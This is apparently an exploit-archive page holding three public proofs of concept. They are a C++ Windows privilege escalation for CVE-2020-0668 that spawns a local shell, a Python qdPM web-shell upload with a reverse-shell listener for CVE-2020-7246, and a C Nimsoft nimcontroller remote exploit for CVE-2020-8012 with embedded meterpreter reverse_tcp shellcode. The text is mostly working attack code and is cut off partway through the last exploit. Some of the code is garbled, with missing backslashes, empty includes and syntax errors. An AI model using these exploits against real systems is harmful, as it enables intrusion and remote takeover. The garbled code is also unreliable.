This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Tracing functionality used by the Routing and Remote Access service. The issue results from the lack of proper permissions on registry keys that control this functionality. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM.

MD5 | 10f155214b43543ed6228cacf1da3f77

# Exploit Title: Windows Kernel Elevation of Privilege Vulnerability +
PWN-OS-FAKE UPDATE Windows 10 - Local
# Author: nu11secur1ty
# Date: 2020-02-27
# Vendor: Microsoft
# Link:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0668
# CVE: 2020-0668


[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source:
https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0668
[+] twitter.com/nu11secur1ty


[Exploit Program Code]
# 2020-0668-WKEPV

- - 2020-0668-WKEPV.cpp

#include
#include "MiniUsoClient.h"
#include "TcpClient.h"

#define TEMPO 2000

int wmain(int argc, wchar_t** argv)
{
TcpClient tcpClient;
int iRes = 0;

// Try to trigger DLL loading with 'StartScan'
wprintf_s(L"[*] Using UpdateOrchestrator->StartScan()n");
MiniUsoClient miniUsoClient;
if (!miniUsoClient.Run(USO_STARTSCAN))
return 1;


//wprintf_s(L"[*] Waiting for the DLL to be loaded...n");
Sleep(TEMPO);

iRes = tcpClient.connectTCP("127.0.0.1", "1337");

if (iRes != 0)
{
wprintf_s(L"[*] Retrying with
UpdateOrchestrator->StartInteractiveScan()n");
if (!miniUsoClient.Run(USO_STARTINTERACTIVESCAN))
return 2;

Sleep(TEMPO);

iRes = tcpClient.connectTCP("127.0.0.1", "1337");
}

if (iRes != 0)
{
wprintf_s(L"[*] Retrying with UpdateOrchestrator->StartDownload()n");
if (!miniUsoClient.Run(USO_STARTDOWNLOAD))
return 3;

Sleep(TEMPO);

iRes = tcpClient.connectTCP("127.0.0.1", "1337");
}

if (iRes != 0)
{
wprintf_s(L"[-] Exploit failed.");
}
else
{
wprintf_s(L"[+] Exploit successfull @nu11secur1ty");
}

return 0;
}


-----------------------------------------------------------------
- - MiniUsoClient.cpp

#include "MiniUsoClient.h"
#pragma comment(lib, "rpcrt4.lib")

MiniUsoClient::MiniUsoClient()
{
HRESULT hResult;

hResult = CoInitializeEx(0, COINIT_MULTITHREADED);
if (FAILED(hResult))
{
wprintf_s(L" |__ CoInitializeEx() failed. Error code = 0x%08Xn",
hResult);
_ready = false;
}
else
{
_ready = true;
}
}

MiniUsoClient::~MiniUsoClient()
{
CoUninitialize();
}

void MiniUsoClient::ThrowOnError(HRESULT hResult)
{
if (hResult != 0)
{
throw _com_error(hResult);
}
}

bool MiniUsoClient::Run(UsoAction action)
{
HRESULT hResult;

if (this->_ready)
{
wprintf_s(L" |__ Creating instance of 'UpdateSessionOrchestrator'... ");

GUID CLSID_UpdateSessionOrchestrator = { 0xb91d5831, 0xb1bd, 0x4608, {
0x81, 0x98, 0xd7, 0x2e, 0x15, 0x50, 0x20, 0xf7 } };
IUpdateSessionOrchestratorPtr updateSessionOrchestrator;
hResult = CoCreateInstance(CLSID_UpdateSessionOrchestrator, nullptr,
CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&updateSessionOrchestrator));
if (FAILED(hResult))
{
wprintf_s(L"n |__ CoCreateInstance() failed. Error code = 0x%08Xn",
hResult);
CoUninitialize();
return false;
}

wprintf_s(L"Done.n");


IUsoSessionCommonPtr usoSessionCommon;
GUID IID_IUsoSessionCommon = { 0xfccc288d, 0xb47e, 0x41fa, { 0x97, 0x0c,
0x93, 0x5e, 0xc9, 0x52, 0xf4, 0xa4 } };
try
{
wprintf_s(L" |__ Creating a new Update Session... ");
updateSessionOrchestrator->CreateUpdateSession(1, &IID_IUsoSessionCommon,
&usoSessionCommon);
wprintf_s(L"Done.n");

//wprintf_s(L" |__ Calling 'CoSetProxyBlanket()'... ");
ThrowOnError(CoSetProxyBlanket(usoSessionCommon, RPC_C_AUTHN_DEFAULT,
RPC_C_AUTHZ_DEFAULT, COLE_DEFAULT_PRINCIPAL, RPC_C_AUTHN_LEVEL_DEFAULT,
RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, NULL));
//wprintf_s(L"Done.n");

switch (action)
{
case USO_STARTSCAN:
wprintf(L" |__ Calling 'StartScan'... ");
ThrowOnError(usoSessionCommon->Proc21(0, 0, L"ScanTriggerUsoClient"));
wprintf(L"Done.n");
break;
case USO_STARTDOWNLOAD:
wprintf(L" |__ Calling 'StartDownload'... ");
ThrowOnError(usoSessionCommon->Proc22(0));
wprintf(L"Done.n");
break;
case USO_STARTINTERACTIVESCAN:
wprintf(L" |__ Calling 'StartInteractiveScan'... ");
ThrowOnError(usoSessionCommon->Proc21(0xffffffff, 0,
L"ScanTriggerUsoClientInteractive"));
wprintf(L"Done.n");
break;
}

}
catch (const _com_error& error)
{
wprintf_s(L"n |__ Something went wrong (%08X - "%ls").n",
error.Error(), error.ErrorMessage());
return false;
}
}
else
{
return false;
}

return true;
}


-------------------------------------------------------------------
- - TcpClient.cpp

#include
#include
#include
#include
#include

#include "TcpClient.h"

#pragma comment (lib, "Ws2_32.lib")
#pragma comment (lib, "Mswsock.lib")
#pragma comment (lib, "AdvApi32.lib")

TcpClient::TcpClient(){}

TcpClient::~TcpClient()
{
WSACleanup();
}

int TcpClient::connectTCP(const char* hostname, const char* port)
{
WSADATA wsaData;
SOCKET socketClient = INVALID_SOCKET;
struct addrinfo* result = NULL, * ptr = NULL, hints;
int iResult = 0;
//int recvbuflen = BUFSIZE;
DWORD dwThreadIdOut;
DWORD dwThreadIdIn;
HANDLE hThreadOut;
HANDLE hThreadIn;

// Initialize Winsock
iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (iResult != 0) {
wprintf_s(L"WSAStartup failed with error: %dn", iResult);
return 1;
}

ZeroMemory(&hints, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;

// Resolve the server address and port
iResult = getaddrinfo(hostname, port, &hints, &result);
if (iResult != 0) {
wprintf_s(L"getaddrinfo failed with error: %dn", iResult);
WSACleanup();
return 1;
}

// Attempt to connect to an address until one succeeds
for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {

// Create a SOCKET for connecting to server
socketClient = socket(ptr->ai_family, ptr->ai_socktype,
ptr->ai_protocol);
if (socketClient == INVALID_SOCKET) {
wprintf_s(L"socket failed with error: %ldn", WSAGetLastError());
WSACleanup();
return 1;
}

// Connect to server.
iResult = connect(socketClient, ptr->ai_addr, (int)ptr->ai_addrlen);
if (iResult == SOCKET_ERROR) {
closesocket(socketClient);
socketClient = INVALID_SOCKET;
continue;
}
break;
}

freeaddrinfo(result);

if (socketClient == INVALID_SOCKET) {
wprintf_s(L"[-] Unable to connect to server!n");
WSACleanup();
return 1;
}

// Create a thread to receive data from the socket in an infinite loop
hThreadOut = CreateThread(NULL, 0, ReceiveDataFromSocket,
(LPVOID)socketClient, 0, &dwThreadIdOut);
if (hThreadOut == NULL)
{
wprintf_s(L"[-] Create thread failed: ReceiveDataFromSocketn");
return -1;
}

// Create a thread to read user input in an infinite loop
hThreadIn = CreateThread(NULL, 0, SendDataFromConsole,
(LPVOID)socketClient, 0, &dwThreadIdIn);
if (hThreadIn == NULL)
{
wprintf_s(L"[-] Create thread failed: SendDataFromConsolen");
return -1;
}

wprintf_s(L"[+] Spawning shell...n");

// Wait for the socket to be closed
WaitForSingleObject(hThreadOut, INFINITE);

// shutdown the connection since no more data will be sent
iResult = shutdown(socketClient, SD_SEND);
if (iResult == SOCKET_ERROR) {
wprintf_s(L"shutdown failed with error: %dn", WSAGetLastError());
closesocket(socketClient);
WSACleanup();
return 1;
}

// cleanup
CloseHandle(hThreadIn);
CloseHandle(hThreadOut);
closesocket(socketClient);
WSACleanup();

return 0;
}

DWORD WINAPI TcpClient::ReceiveDataFromSocket(LPVOID lpvParam)
{
int iResult;
SOCKET socketClient = (SOCKET)lpvParam;
char bufReceive[BUFSIZE];

while (true)
{
ZeroMemory(bufReceive, BUFSIZE);
iResult = recv(socketClient, bufReceive, BUFSIZE, 0);
if (iResult > 0)
{
printf("%s", bufReceive);
}
else
break;
}
return 0;
}

DWORD WINAPI TcpClient::SendDataFromConsole(LPVOID lpvParam)
{
HANDLE hStdin;
BOOL bSuccess = FALSE;
DWORD dwRead = 0;
SOCKET socketClient = (SOCKET)lpvParam;
int iResult = 0;
char bufCmd[BUFSIZE];
char* pCr = { 0 };
char* pLf = { 0 };

// Get a handle on standard input
hStdin = GetStdHandle(STD_INPUT_HANDLE);
if (hStdin == INVALID_HANDLE_VALUE)
return 1;

while (true)
{
bSuccess = ReadFile(hStdin, bufCmd, BUFSIZE, &dwRead, NULL);
if (bSuccess == FALSE)
break;

pCr = strchr(bufCmd, 'r');
if (pCr != NULL)
{
pLf = strchr(bufCmd, 'n');
if (pLf != NULL)
{
pCr[0] = 'n';
pLf[0] = 0;
}
}

iResult = send(socketClient, bufCmd, (int)strlen(bufCmd), 0);
if (iResult == SOCKET_ERROR) {
printf("send failed with error: %dn", WSAGetLastError());
break;
}
}
return 0;
}


- - PWN-OS-FAKE-UPDATE

[link]
https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0668/PWN-Fake-UPDATE-WIN10/Microupdate

#######################################################################

[Vendor]
Microsoft


[Vulnerability Type]
Windows Kernel Elevation of Privilege Vulnerability

[CVE Reference]
An elevation of privilege vulnerability exists in the way that the Windows
Kernel handles objects in memory.
An attacker who successfully exploited the vulnerability could execute code
with elevated permissions.
To exploit the vulnerability, a locally authenticated attacker could run a
specially crafted application.
The security update addresses the vulnerability by ensuring the Windows
Kernel properly handles objects in memory.

[Security Issue]
This vulnerability allows local attackers to escalate privileges on
affected installations of Microsoft Windows.
An attacker must first obtain the ability to execute low-privileged code on
the target system in order to exploit this vulnerability.
The specific flaw exists within the Tracing functionality used by the
Routing and Remote Access service.
The issue results from the lack of proper permissions on registry keys that
control this functionality.
An attacker can leverage this vulnerability to escalate privileges and
execute code in the context of SYSTEM.


[Network Access]
Local


[Video]
https://www.youtube.com/watch?v=ml2feXa6cCY


[Disclosure Timeline]
Published: 02/11/2020


[Conclusion]
The building of a new module for restricting and checking a malicious
execution code from any local user on the machine.
For example, please see:
https://github.com/nu11secur1ty/insmod_block


@nu11secur1ty
https://www.nu11secur1ty.com/

BR

--

hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty

Source

qdPM versions prior to 9.1 suffer from a remote shell upload vulnerability that allows for remote code execution.

MD5 | df9b1db93b79b6c69b0ccf3415728a46

#!/usr/bin/python

#-------------------------------------------------------------------------------------
# Title: qdPM Webshell Upload + RCE Exploit (qdPMv9.1 and below) (CVE-2020-7246)
# Author: Tobin Shields (@TobinShields)
#
# Description: This is an exploit to automatically upload a PHP web shell to
# the qdPM platform via the "upload a profile photo" feature.
# This method also bypasses the fix put into place from a previous CVE
#
# Usage: In order to leverage this exploit, you must know the credentials of
# at least one user. Then, you should modify the values highlighted below.
# You will also need a .php web shell payload to upload. This exploit
# was built and tested using the PHP script built by pentestmonkey:
# https://github.com/pentestmonkey/php-reverse-shell
#-------------------------------------------------------------------------------------

# Imports
from requests import Session
from bs4 import BeautifulSoup as bs
import socket
from multiprocessing import Process
import time

# CHANGE THESE VALUES-----------------------------------------------------------------
login_url = "http://[victim_domain]/path/to/qdPM/index.php/login"
username = "jsmith@example.com"
password = "Pa$$w0rd"
payload = "/path/to/payload.php"
listner_port = 1234 # This should match your PHP payload
connection_delay = 2 # Increase this value if you have a slow connection and are experiencing issues
# ------------------------------------------------------------------------------------

# Build the myAccout URL from the provided URL
myAccount_url = login_url.replace("login", "myAccount")

# PROGRAM FUNCTIONS -----------------------------------------------------------------
# Utility function for anytime a page needs to be requested and parsed via bs4
def requestAndSoupify(url):
page = s.get(url)
soup = bs(page.content, "html.parser")
return soup

# Function to log into the application, and supply the correct username/password
def login(url):
# Soupify the login page
login_page = requestAndSoupify(url)
# Grab the csrf token
token = login_page.find("input", {"name": "login[_csrf_token]"})["value"]
# Build the POST values
login_data = {
"login[email]": username,
"login[password]": password,
"login[_csrf_token]": token
}
# Send the login request
s.post(login_url, login_data)

# Function to get the base values for making a POST request from the myAccount page
def getPOSTValues():
myAccount_soup = requestAndSoupify(myAccount_url)
# Search for the 'base' POST data needed for any requests
u_id = myAccount_soup.find("input", {"name": "users[id]"})["value"]
token = myAccount_soup.find("input", {"name": "users[_csrf_token]"})["value"]
u_name = myAccount_soup.find("input", {"name": "users[name]"})["value"]
u_email = myAccount_soup.find("input", {"name": "users[email]"})["value"]
# Populate the POST data object
post_data = {
"users[id]": u_id,
"users[_csrf_token]": token,
"users[name]": u_name,
"users[email]": u_email,
"users[culture]": "en" # Keep the language English--change this for your victim locale
}
return post_data

# Function to remove the a file from the server by exploiting the CVE
def removeFile(file_to_remove):
# Get base POST data
post_data = getPOSTValues()
# Add the POST data to remove a file
post_data["users[photo_preview]"] = file_to_remove
post_data["users[remove_photo]"] = 1
# Send the POST request to the /update page
s.post(myAccount_url + "/update", post_data)
# Print update to user
print("Removing " + file_to_remove)
# Sleep to account for slow connections
time.sleep(connection_delay)

# Function to upload the payload to the server
def uploadPayload(payload):
# Get payload name from supplied URI
payload_name = payload.rsplit('/', 1)[1]
# Request page and get base POST files
post_data = getPOSTValues()
# Build correct payload POST header by dumping the contents
payload_file = {"users[photo]": open(payload, 'rb')}
# Send POST request with base data + file
s.post(myAccount_url + "/update", post_data, files=payload_file)
# Print update to user
print("Uploading " + payload_name)
# Sleep for slow connections
time.sleep(connection_delay)

# A Function to find the name of the newly uploaded payload
# NOTE: We have to do this because qdPM adds a random number to the uploaded file
# EX: webshell.php becomes 1584009-webshell.php
def getPayloadURL():
myAccount_soup = requestAndSoupify(myAccount_url)
payloadURL = myAccount_soup.find("img", {"class": "user-photo"})["src"]
return payloadURL

# Function to handle creating the webshell listener and issue commands to the victim
def createBackdoorListener():
# Set up the listening socket on localhost
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "0.0.0.0"
port = listner_port # Specified at the start of this script by user
server_socket.bind((host, port))
server_socket.listen(2)
victim, address = server_socket.accept()
# Print update to user once the connection is made
print("Received connection from: " + str(address))

# Simulate a terminal and build a pusdo-prompt using the victem IP
prompt = "backdoor@" + str(address[0]) + ":~$ "

# Grab the first response from the victim--this is usually OS info
response = victim.recv(1024).decode('utf-8')
print(response)
print("nType 'exit' at any time to close the connection")

# Maintain the connection and send data back and forth
while True:
# Grab the command from the user
command = input(prompt)
# If they type "exit" then close the socket
if 'exit' in command:
victim.close()
server_socket.close()
print("Disconnecting, please wait...")
break
# For all other commands provided
else:
# Encode the command to be properly sent via the socket & send the command
command = str.encode(command + "n")
victim.send(command)
# Grab the response to the command and decode it
response = victim.recv(1024).decode('utf-8')
# For some odd reason you have to hit "enter" after sending the command to receive the output
# TODO: Fix this so it works on a single send? Although it might just be the PHP webshell
victim.send(str.encode("n"))
response = victim.recv(1024).decode('utf-8')
# If a command returns nothing (i.e. a 'cd' command, it prints a "$"
# This is a confusing output so it will omit this output
if response.strip() != "$":
print(response)

# Trigger the PHP to run by making a page request
def triggerShell(s, payloadURL):
pageReq = s.get(payloadURL)

# MAIN FUNCTION ----------------------------------------------------------------------
# The main function of this program establishes a unique session to issue the various POST requests
with Session() as s:
# Login as know user
login(login_url)
# Remove Files
# You may need to modify this list if you suspect that there are more .htaccess files
# However, the default qdPM installation just had these two
files_to_remove = [".htaccess", "../.htaccess"]
for f in files_to_remove:
removeFile(f)
# Upload payload
uploadPayload(payload)
# Get the payload URL
payloadURL = getPayloadURL()
# Start a thread to trigger the script with a web request
process = Process(target=triggerShell, args=(s, payloadURL))
process.start()
# Create the backdoor listener and wait for the above request to trigger
createBackdoorListener()

Source

Nimsoft nimcontroller version 7.80 suffers from an unauthenticated remote code execution vulnerability.

MD5 | 191766a5277a4253e369b17103b4ba2c

/**************************************************************************************************************************
* Exploit Title : Sing About Me, I'm Dying Of Thirst *
* Exploit Author : wetw0rk *
* Exploit Version : Public POC *
* CVE : CVE-2020-8012 *
* Vendor Homepage : https://docops.ca.com/ca-unified-infrastructure-management/9-0-2/en *
* Software Version : 7.80 *
* Tested on : Windows 10 Pro (x64), Windows Server 2012 R2 Standard (x64) *
* Software Link : Good luck *
* *
* Description: *
* *
* Unauthenticated Nimbus nimcontroller RCE, tested against build 7.80.3132 although multiple versions are affected. *
* The exploit won't crash the service. *
* *
* You may have to run the exploit code multiple times on Windows Server 2012. If you exploit Windows Server 2019 it *
* should work as well just didn't get a chance to test it (reversing other things), I put faith in my ROP chain being *
* universal (worked first try on 2012). *
* *
* Note: *
* *
* This is what it looks like, a fully remote stack based userland x64 exploit (NOT WOW64) and YES this did bypass *
* the stack cookie. WE OUT HERE!!! *
* *
* Compile: *
* *
* gcc poc_release.c -o singAboutMeImDyingOfThirst *
* *
* Shoutout: *
* *
* Xx25, SneakyNachos, liquidsky, Itzik, r4g1n-cajun, FR13NDZ, Geluchat, ihack4falafel, cheshire_jack, the NSA *
* for dropping Ghidra, and my Mentor *
* *
* ----------------------------------------------- ReSpoNsIb1E Di$C10sUrE ----------------------------------------------- *
* 11/07/19 - Vendor contacted (POC code and POC video sent) *
* 11/15/19 - Vendor contacted for update, engineering team unable to reproduce bug *
* 11/20/19 - Vendor cannot reproduce bug, call for a demo scheduled *
* 11/22/19 - Vendor rescheduled to Dec 3rd, claims (...) *
* 12/03/19 - Vendor confirms exploitability and vulnerability presence *
* 12/13/19 - Vendor finalizing hotfix *
* 12/19/19 - Vendor hotfix tested against POC code *
* 01/07/20 - Vendor contacted for update on patch and case status, followed up on 01/14/20 *
* 01/21/20 - Vendor replies (awaiting more info) *
* 01/27/20 - Vendor requests exploit code to release in late February to allow customers time to patch *
* 02/XX/20 - PoC sample dropped *
**************************************************************************************************************************/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.157 LPORT=42 -f c */
unsigned char shellcode[] =
"xfcx48x83xe4xf0xe8xccx00x00x00x41x51x41x50x52"
"x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48"
"x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9"
"x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41"
"x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48"
"x01xd0x66x81x78x18x0bx02x0fx85x72x00x00x00x8b"
"x80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8b"
"x48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41"
"x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1"
"xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45"
"x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8b"
"x0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01"
"xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48"
"x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9"
"x4bxffxffxffx5dx49xbex77x73x32x5fx33x32x00x00"
"x41x56x49x89xe6x48x81xecxa0x01x00x00x49x89xe5"
"x49xbcx02x00x00x2axc0xa8x9fx9dx41x54x49x89xe4"
"x4cx89xf1x41xbax4cx77x26x07xffxd5x4cx89xeax68"
"x01x01x00x00x59x41xbax29x80x6bx00xffxd5x6ax0a"
"x41x5ex50x50x4dx31xc9x4dx31xc0x48xffxc0x48x89"
"xc2x48xffxc0x48x89xc1x41xbaxeax0fxdfxe0xffxd5"
"x48x89xc7x6ax10x41x58x4cx89xe2x48x89xf9x41xba"
"x99xa5x74x61xffxd5x85xc0x74x0ax49xffxcex75xe5"
"xe8x93x00x00x00x48x83xecx10x48x89xe2x4dx31xc9"
"x6ax04x41x58x48x89xf9x41xbax02xd9xc8x5fxffxd5"
"x83xf8x00x7ex55x48x83xc4x20x5ex89xf6x6ax40x41"
"x59x68x00x10x00x00x41x58x48x89xf2x48x31xc9x41"
"xbax58xa4x53xe5xffxd5x48x89xc3x49x89xc7x4dx31"
"xc9x49x89xf0x48x89xdax48x89xf9x41xbax02xd9xc8"
"x5fxffxd5x83xf8x00x7dx28x58x41x57x59x68x00x40"
"x00x00x41x58x6ax00x5ax41xbax0bx2fx0fx30xffxd5"
"x57x59x41xbax75x6ex4dx61xffxd5x49xffxcexe9x3c"
"xffxffxffx48x01xc3x48x29xc6x48x85xf6x75xb4x41"
"xffxe7x58x6ax00x59x49xc7xc2xf0xb5xa2x56xffxd5";

const char *exploited[] =
{
"10.0.18362",
"6.3.9600",
};

const char *versions[]=
{
"7.80 [Build 7.80.3132, Jun 1 2015]",
};

/********************************************************************************************************************
* *
* NimsoftProbe: *
* *
* This is the structure used for the packet generator, it will be used specifically as the return type. Within *
* the structure there are 2 members, first the pointer to the packet and secondly the packet length. *
* *
* NimsoftProbe *packet_gen(char *lparams[], int nparams, int exploit_buffer): *
* *
* This function will generate a nimbus probe, taken from nimpack (tool I developed while reverse engineering) a *
* few modifications where made to handle the exploit buffer (mainly since it contains NULLS). *
* *
********************************************************************************************************************/

#define PHLEN 300 /* header */
#define PBLEN 2000 /* body */
#define PALEN 10000 /* argv */
#define FPLEN 20000 /* final probe */

#define CLIENT "127.0.0.1/1337"

#define INTSIZ(x) snprintf(NULL, 0, "%i", x)

unsigned char packet_header[] =
"x6ex69x6dx62x75x73x2fx31x2ex30x20%dx20%dx0dx0a";
unsigned char packet_body[] =
/* nimbus header */
"x6dx74x79x70x65x0F" /* mtype */
"x37x0Fx34x0Fx31x30x30x0F" /* 7.4.100 */
"x63x6dx64x0F" /* cmd */
"x37x0F%dx0F" /* 7.x */
"%sx0F" /* probe */
"x73x65x71x0F" /* seq */
"x31x0Fx32x0Fx30x0F" /* 1.2.0 */
"x74x73x0F" /* ts */
"x31x0F%dx0F" /* 1.X */
"%dx0F" /* UNIX EPOCH */
"x66x72x6dx0F" /* frm */
"x37x0F%dx0F" /* 7.15 */
"%sx0F" /* client addr */
"x74x6fx75x74x0F" /* tout */
"x31x0Fx34x0Fx31x38x30x0F" /* 1.4.180 */
"x61x64x64x72x0F" /* addr */
"x37x0Fx30x0F"; /* 7.0 */

typedef struct {
char *packet;
int length;
} NimsoftProbe;

NimsoftProbe *packet_gen(char *lparams[], int nparams, int exploit_buffer)
{
int index = 0;
int fmt_args;
int lbody = 0;
int largs = 0;
char *tptr;
char pheader[PHLEN];
char pbody[PBLEN];
char pargs[PALEN];
char pbuffer[FPLEN];
char temp_buffer[80];
char *probe = lparams[0];

int epoch_time = (int)time(NULL);

NimsoftProbe *probePtr = (NimsoftProbe*)malloc(sizeof(NimsoftProbe));

fmt_args = snprintf(NULL, 0, "%d%s%d%d%d%s",
(strlen(probe)+1),
probe,
(INTSIZ(epoch_time)+1),
epoch_time,
(strlen(CLIENT)+1),
CLIENT
);

if ((fmt_args + sizeof(packet_body)) > PBLEN) {
printf("Failed to generate packet bodyn");
exit(-1);
}

lbody = snprintf(pbody, PBLEN, packet_body,
(strlen(probe)+1),
probe,
(INTSIZ(epoch_time)+1),
epoch_time,
(strlen(CLIENT)+1),
CLIENT
);

for (i = 1; i < nparams; i++)
{
memset(temp_buffer, '', 80);

for (j = 0; j < strlen(lparams[i]); j++)
{
if ((c = lparams[i][j]) == '=')
{
memcpy(temp_buffer, lparams[i], j);
index = ++j;
break;
}
}

tptr = lparams[i];

if ((c = 1, c += strlen(temp_buffer)) < PALEN) {
largs += snprintf(pargs+largs, c, "%s", temp_buffer);
largs++;
} else {
printf("Failed to generate packet argumentsn");
exit(-1);
}

if (index > 0 && exploit_buffer == 0)
{
tptr = tptr+index;

if ((largs + strlen(tptr) + 2) < PALEN)
{
largs += snprintf(pargs+largs, 2, "%s", "1");
largs++;

largs += snprintf(pargs+largs, strlen(tptr)+1, "%d", strlen(tptr)+1);
largs++;
} else {
printf("Failed to generate packet argumentsn");
exit(-1);
}

c = 1, c += strlen(tptr);
if ((largs + c) < PALEN)
{
largs += snprintf(pargs+largs, c, "%s", tptr);
largs++;
} else {
printf("Failed to generate packet argumentsn");
exit(-1);
}
}

if (index > 0 && exploit_buffer > 0)
{
tptr = tptr+index;

if ((largs + exploit_buffer + 2) < PALEN)
{
largs += snprintf(pargs+largs, 2, "%s", "1");
largs++;

largs += snprintf(pargs+largs, 5, %d", exploit_buffer+1);
largs++;
} else {
printf("Failed to generate packet argumentsn");
exit(-1);
}

c = 1, c += exploit_buffer;

if ((largs + c) < PALEN)
{
memcpy(pargs+largs, tptr, c);
largs += exploit_buffer;
largs++;
} else {
printf("Failed to generate packet argumentsn");
exit(-1);
}
}
}

index = snprintf(pbuffer, FPLEN, packet_header, lbody, largs);
index += lbody;

if (index < FPLEN) {
strncat(pbuffer, pbody, lbody);
} else {
printf("Failed to concatenate packet bodyn");
exit(-1);
}

for (i = 0; i < index; i++)
if (pbuffer[i] == 'x0f')
pbuffer[i] = 'x00';

if ((index + largs) < FPLEN) {
for (i = 0; i < largs; i++)
pbuffer[index++] = pargs[i];
}
else {
printf "Failed to concatenate packet argumentsn");
exit(-1);
}

probePtr->packet = pbuffer;
probePtr->length = index;

return probePtr;
}

/*********************************************************************************************************************
* *
* int parse_directory(char *response, int length): *
* *
* This function will parse the directory contents, specifically looking for the entry keyword; if found, we can *
* proceed with exploitation. *
* *
* int check_vulnerability(char *rhost, int rport): *
* *
* This function will send a Nimbus probe to the target controller, specifically the directory_list probe. Once *
* sent the returned packet will be parsed by parse_directory. *
* *
*********************************************************************************************************************/

#define PE "(33[1m33[31m-33[0m)"
#define PI "(33[1m33[94m*33[0m)"
#define PG "(33[1m33[92m+33[0m)"

int parse_directory(char *response, int length)
{
int i;
int backup;
int check = 0;
int index = 0;

char buf[80];
struct tm ts;
time_t capture;

if (strncmp(response, "nimbus/1.0", 10) != 0)
return -1;

while (index < length)
{
if (strcmp("entry", (response+index)) == 0)
printf("%s Persistence is an artnn", PG);

if (strcmp("name", (response+index)) == 0) {
backup = index;
check = 1;

/* last modified */
for (int i = 0; i < 15; i++)
index += strlen(response+index) + 1;
capture = atoi(response+index);
ts = *localtime(&capture);
strftime(buf, sizeof(buf), "%m/%d/%Y %I:%M %p", &ts);
printf("%12s ", buf);
index = backup;

/* type */
for (int i = 0; i < 7; i++)
index += strlen(response+index) + 1;
if (strcmp("2", (response+index)) == 0)
printf("%7s", " ");
else
printf("%-7s", "");
index = backup;
/* name */
for (int i = 0; i < 3; i++)
index += strlen(response+index) + 1;
printf("%sn", response+index);
}
index += strlen(response+index) + 1;
}

return (check != 1) ? -1 : 0;
}

int check_vulnerability(char *rhost, int rport)
{
int c;
int sock;
int count;

NimsoftProbe *probe;
char response[BUFSIZ];
struct sockaddr_in srv;
char *get_directory_listing[] = { "directory_list", "directory=C:\", "detail=1" };

probe = packet_gen(get_directory_listing, 3, 0);

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
return -1;

srv.sin_addr.s_addr = inet_addr(rhost);
srv.sin_port = htons(rport);
srv.sin_family = AF_INET;

if (connect(sock , (struct sockaddr *)&srv, sizeof(srv)) < 0)
return -1;
printf("%s Verifying vulnerable probe is reachablen", PI);

send(sock, probe->packet, probe->length, 0);
count = read(sock, response, BUFSIZ);

if (parse_directory(response, count) == 0)
printf("n%s Target ready for exploitationn", PG);
else
return -1;

free(probe);
close(sock);

return 0;
}

/********************************************************************************************************************
* *
* char *nimdex(char *haystack, char *needle, int size): *
* *
* This function works similar to strstr, however it was specifically made to index "keys" to their respective *
* "values" within a Nimbus packet. It has only been tested against the get_info packet. *
* *
* int parse_response(char *response, int length): *
* *
* This function leverages nimdex to perform 2 checks. The first check will verify the target operating system *
* has been exploited, the second check will verify the Nimbus controller version is exploitable (or rather has *
* a ROP chain ready). In order for exploitation to succeed only the second check needs to pass, I have faith in *
* my ROP chain being universal. *
* *
* int check_version(char *rhost, int rport): *
* *
* This function will send a Nimbus probe to the target controller, specifically the get_info probe. Once sent *
* the returned packet will be parsed by parse_response. *
* *
********************************************************************************************************************/

char *nimdex(char *haystack, char *needle, int size)
{
int found = 0;
int index = 0;

if (strncmp(haystack, "nimbus/1.0", 10) != 0)
return NULL;

while (index < size)
{
if (strcmp(needle, (haystack+index)) == 0)
found = 2;
else if (found >= 2)
found++;
if (found == 5)
return &haystack[index];
index += strlen(haystack+index) + 1;
}
return NULL;
}

int parse_response(char *response, int length)
{
int i;
int c;
char *ptr;
int check = 0;
int nv = sizeof(versions)/sizeof(versions[0]);
int ne = sizeof(exploited)/sizeof(exploited[0]);

if ((ptr = nimdex(response, "os_minor", length)) == NULL)
return -1;
printf("%s Probe successful, detected: %sn", PI, ptr);

if ((ptr = nimdex(response, "os_version", length)) == NULL)
return -1;

for (i = 0; i < ne; i++)
if ((strcmp(exploited[i], ptr)) == 0)
check = 1;

if (check != 1)
{
printf("%s Exploit has not been tested against OS versionn", PE);
printf("%s Continute exploitation (Y/N): ", PE);

c = getchar();
if (tolower(c) != 'y')
exit(-1);

printf("%s If exploitation successful, update code!!!n", PI);
if ((ptr = nimdex(response, "os_version", length)) == NULL)
return -1;
printf("%s Target OS ID: %sn", PI, ptr);
}
else
printf("%s Target OS appears to be exploitablen", PI);

check = 0;

if ((ptr = nimdex(response, "version", length)) == NULL)
return -1;

for (i = 0; i < nv; i++)
if ((strcmp(versions[i], ptr)) == 0)
check = 1;

if (check != 1) {
